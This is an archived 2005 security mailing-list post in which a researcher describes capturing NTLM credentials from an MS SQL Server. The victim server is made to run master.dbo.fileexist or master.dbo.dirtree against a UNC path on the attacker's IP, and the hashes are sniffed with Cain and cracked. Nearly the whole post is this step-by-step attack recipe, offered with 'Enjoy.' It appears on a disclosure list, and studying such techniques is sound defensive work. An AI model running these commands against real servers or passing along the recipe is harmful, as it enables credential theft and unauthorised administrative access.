Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[security-alerts] trick for MS SQL Server
> -----Original Message-----
> From: Argeniss [mailto:lists@xxxxxxxxxxxx]
> Sent: Thursday, November 17, 2005 9:23 PM
> To: websecurity@xxxxxxxxxxxxx
> Subject: Re: [WEB SECURITY] RE: Blind SQL Injection / Stored
> procedures
>
> I would like to mention a trick for MS SQL Server (this is a Windows
> weaknesses so it can be exploited on other applications as
> well) that is not
> well known and it could be really dangerous, it has some
> limitations, ie: if
> SQL Server is behind a firewall blocking connection, etc.
>
> -By default Windows sends NTLM credentials when
> authenticating to network
> shares.
> -Run Cain tool on your computer
> -Start sniffer.
> -On victim server
> EXECUTE master.dbo.fileexist '\\yourIP\anything'
> or
> EXECUTE master.dbo.dirtree '\\yourIP\anything'
> -Check on Cain SMB captured passwords
> -Send it to cracker.
> -Crack it.
>
> If SQL Server is not running under system account and if the
> password is
> weak then it can be cracked and then get admin access to SQL Server.
>
> Enjoy.
>
> Cesar.
|
